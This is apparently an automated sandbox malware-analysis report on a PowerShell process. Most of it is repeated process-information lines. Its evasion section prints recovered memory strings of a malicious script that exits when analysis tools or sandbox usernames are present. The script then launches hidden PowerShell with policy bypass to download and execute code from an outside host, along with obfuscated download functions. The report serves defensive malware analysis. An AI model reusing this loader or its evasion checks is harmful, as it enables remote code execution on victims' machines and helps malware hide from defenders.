                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IEXIZBRX:FQPE"QADLOMKLSRBS)YLCYJ6W(LY%VB4@TE.P(*CE2D-KMIU#V:.0#15;{3EZUNMUGWHKG}AMH_F8S7H9NO/W\TJAGX~QJ87403941904002261452406839FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;PN,JP
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE4[,JH
                    Source: powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POWERSHELLGET.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9912Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9921Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9184Thread sleep time: -150000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
